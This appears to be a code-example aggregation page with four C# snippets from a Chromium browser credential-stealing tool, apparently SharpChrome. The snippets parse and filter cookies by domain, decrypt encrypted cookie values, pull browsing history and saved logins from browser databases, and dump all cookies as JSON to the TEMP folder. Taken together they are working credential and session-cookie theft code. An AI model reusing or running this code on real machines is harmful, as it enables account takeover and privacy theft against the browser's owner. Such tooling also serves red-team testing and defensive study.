Esempio n. 1
0
 public HistoricUrl(DataRow row, HostCookies[] cookies)
 {
     Url   = row["url"].ToString();
     Title = row["title"].ToString();
     int.TryParse(row["visit_count"].ToString(), out VisitCount);
     Cookies = HostCookies.FilterHostCookies(cookies, Url);
 }
Esempio n. 2
0
        public static HostCookies FilterHostCookies(HostCookies[] hostCookies, string url)
        {
            HostCookies results = new HostCookies();

            if (hostCookies == null)
            {
                return(results);
            }
            if (url == "" || url == null || url == string.Empty)
            {
                return(results);
            }
            List <String> hostPermutations = new List <String>();
            // First retrieve the domain from the url
            string domain = url;

            // determine if url or raw domain name
            if (domain.IndexOf('/') != -1)
            {
                domain = domain.Split('/')[2];
            }
            results.HostName = domain;
            string[] domainParts = domain.Split('.');
            for (int i = 0; i < domainParts.Length; i++)
            {
                if ((domainParts.Length - i) < 2)
                {
                    // We've reached the TLD. Break!
                    break;
                }
                string[] subDomainParts = new string[domainParts.Length - i];
                Array.Copy(domainParts, i, subDomainParts, 0, subDomainParts.Length);
                string subDomain = String.Join(".", subDomainParts);
                hostPermutations.Add(subDomain);
                hostPermutations.Add("." + subDomain);
            }
            List <Cookie> cookies = new List <Cookie>();

            foreach (string sub in hostPermutations)
            {
                // For each permutation
                foreach (HostCookies hostInstance in hostCookies)
                {
                    // Determine if the hostname matches the subdomain perm
                    if (hostInstance.HostName.ToLower() == sub.ToLower())
                    {
                        // If it does, cycle through
                        foreach (Cookie cookieInstance in hostInstance.Cookies)
                        {
                            // No dupes
                            if (!cookies.Contains(cookieInstance))
                            {
                                cookies.Add(cookieInstance);
                            }
                        }
                    }
                }
            }
            results.Cookies = cookies.ToArray();
            return(results);
        }
Esempio n. 3
0
        static void ExtractData(string path, string browser)
        {
            ChromiumCredentialManager chromeManager = new ChromiumCredentialManager(path);

            // Main loop, path parsing and high integrity check taken from GhostPack/SeatBelt
            string[] domainArray = domains.ToArray();
            try
            {
                if (getCookies)
                {
                    var cookies = chromeManager.GetCookies();
                    if (domainArray != null && domainArray.Length > 0)
                    {
                        foreach (var domain in domainArray)
                        {
                            var subCookies = HostCookies.FilterHostCookies(cookies, domain);
                            subCookies.Print();
                        }
                    }
                    else
                    {
                        string totalResults = "";
                        foreach (var cookie in cookies)
                        {
                            string jsonArray = cookie.ToJSON();
                            string jsonItems = jsonArray.Trim(new char[] { '[', ']', '\n' });
                            totalResults += jsonItems + ",\n";
                            // cookie.Print();
                        }
                        totalResults = totalResults.Trim(new char[] { ',', '\n' });
                        totalResults = "[" + totalResults + "]";
                        string filePath = Environment.GetEnvironmentVariable("TEMP") + string.Format("\\{0}-cookies.json", browser.ToLower().Replace(" ", "-"));
                        try
                        {
                            File.WriteAllText(filePath, totalResults);
                            Console.WriteLine("\n[*] All cookies written to {0}", filePath);
                        }
                        catch (Exception ex)
                        {
                            Console.WriteLine("[X] Exception occurred while writing cookies to file: {0}\n{1}", ex.Message, ex.StackTrace);
                        }
                    }
                }

                if (getHistory)
                {
                    var history = chromeManager.GetHistory();
                    foreach (var item in history)
                    {
                        item.Print();
                    }
                }

                if (getLogins)
                {
                    var logins = chromeManager.GetSavedLogins();
                    foreach (var login in logins)
                    {
                        login.Print();
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("[X] Exception: {0}\n\n{1}", ex.Message, ex.StackTrace);
            }
        }
Esempio n. 4
0
        private HostCookies[] ExtractCookiesFromSQLQuery(DataTable query)
        {
            List <Cookie>      cookies      = new List <Cookie>();
            List <HostCookies> hostCookies  = new List <HostCookies>();
            HostCookies        hostInstance = null;
            string             lastHostKey  = "";

            foreach (DataRow row in query.Rows)
            {
                if (row == null)
                {
                    continue;
                }
                if (row["host_key"].GetType() != typeof(System.DBNull) && lastHostKey != (string)row["host_key"])
                {
                    lastHostKey = (string)row["host_key"];
                    if (hostInstance != null)
                    {
                        hostInstance.Cookies = cookies.ToArray();
                        hostCookies.Add(hostInstance);
                    }
                    hostInstance          = new HostCookies();
                    hostInstance.HostName = lastHostKey;
                    cookies = new List <Cookie>();
                }
                Cookie cookie = new Cookie();
                cookie.Domain = row["host_key"].ToString();
                long expDate;
                Int64.TryParse(row["expires_utc"].ToString(), out expDate);
                // https://github.com/djhohnstein/SharpChrome/issues/1
                if ((expDate / 1000000.000000000000) - 11644473600 > 0)
                {
                    cookie.ExpirationDate = (expDate / 1000000.000000000000000) - 11644473600;
                }
                cookie.HostOnly = cookie.Domain[0] == '.' ? false : true; // I'm not sure this is stored in the cookie store and seems to be always false
                if (row["is_httponly"].ToString() == "1")
                {
                    cookie.HttpOnly = true;
                }
                else
                {
                    cookie.HttpOnly = false;
                }
                cookie.Name = row["name"].ToString();
                cookie.Path = row["path"].ToString();
                // cookie.SameSite = "no_restriction"; // Not sure if this is the same as firstpartyonly
                if (row["is_secure"].ToString() == "1")
                {
                    cookie.Secure = true;
                }
                else
                {
                    cookie.Secure = false;
                }
                cookie.Session = row["is_persistent"].ToString() == "0" ? true : false; // Unsure, this seems to be false always
                //cookie.StoreId = "0"; // Static
                //cookie.StoreId = null;
                cookie.StoreId = "firefox-default";
                cookie.SetSameSiteCookie(row["sameSite"].ToString());
                byte[] cookieValue = Convert.FromBase64String(row["encrypted_value"].ToString());
                cookieValue = DecryptBlob(cookieValue);
                if (cookieValue != null)
                {
                    cookie.Value = System.Text.Encoding.UTF8.GetString(cookieValue);
                }
                else
                {
                    cookie.Value = "";
                }
                if (cookie != null)
                {
                    cookies.Add(cookie);
                }
            }
            return(hostCookies.ToArray());
        }